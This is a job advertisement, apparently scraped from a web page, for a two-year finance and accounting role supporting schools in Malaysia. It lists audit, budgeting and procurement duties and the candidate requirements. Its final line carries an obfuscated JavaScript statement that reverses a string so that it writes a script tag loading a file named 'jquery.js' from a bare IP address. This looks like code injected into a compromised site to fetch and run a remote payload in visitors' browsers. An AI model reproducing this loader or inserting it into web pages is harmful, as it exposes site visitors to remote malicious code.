Industry : Education Software
Terms : 2 year contract
(A) Finance & Accounting, Procurement, Inventory and Asset Management
– Analyse existing financial systems & processes in the schools
– Train and advise school financial teams on procedures and processes of recording and reporting in compliance with the Ministry of Education’s guidelines
– Monitor, perform and report audit findings in compliance with the Ministry of Education policies, procedures and guidelines
– Identify, recommend and follow up on areas for improvement and ensure all recommended action items are resolved.
(B) Budgeting and Financial Planning
– Assist school leadership teams in the implementation of school financial budgeting, in line with the School Improvement Plan and Key Performance Targets
– Review all budgets to identify areas for centralised purchasing and cost savings.
– Minimum Degree in Accounting
– Minimum 3 – 5 years’ experience in handling full sets of accounts, budgeting and liaising with external auditors and bankers, with some experience in the Education industry
– Experience in operations accounting and procurement processes an added advantage
– Excellent oral and written communication in Bahasa Malaysia and English
– Self-discipline with strong work ethic and ability to work with minimal supervision
– Excellent planning, problem-solving, as well as data and time management skills.
– Possess own transport and willing to travel to Sunway, Cyberjaya and Seremban. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))